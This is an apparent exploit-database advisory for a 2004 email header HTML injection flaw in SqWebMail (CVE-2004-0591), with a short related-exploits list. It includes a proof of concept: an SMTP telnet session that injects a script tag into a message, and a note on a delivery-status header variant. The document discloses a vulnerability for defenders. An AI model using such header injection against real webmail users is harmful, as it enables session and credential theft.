source: http://www.securityfocus.com/bid/10588/info SqWebMail is reported to be prone to an email header HTML injection vulnerability. This issue presents itself due to a failure of the application to properly sanitize user-supplied email header strings. The problem presents itself when an unsuspecting user views an email message containing malicious HTML and script code in the email header. An attacker can exploit this issue to gain access to an unsuspecting user's cookie based authentication credentials. 1) sending a raw email message with malformed headers, i.e. "<script>alert(document.location)</script>": ashanti@dns:~$ telnet localhost 25 Trying x.x.x.x... Connected to x.x.x.x. Escape character is '^]'. 220 x.x.x.x ESMTP helo foo 250 x.x.x.x mail from:<email@example.com> 250 ok rcpt to:<firstname.lastname@example.org> 250 ok data 354 go ahead <script>alert(document.location)</script> . [...] 2) sending a raw email message with the MIME Content-Type header set to "message/delivery-status" with malformed content (see 1 above).
Related ExploitsTrying to match CVEs (1): CVE-2004-0591
Trying to match OSVDBs (1): 7214
Other Possible E-DB Search Terms: SqWebMail 188.8.131.5240524, SqWebMail
|2005-04-15||SqWebMail 3.x/4.0 - HTTP Response Splitting||Zinho|
|2005-08-29||SqWebMail 5.0.4 - HTML Email IMG Tag Script Injection||Jakob Balle|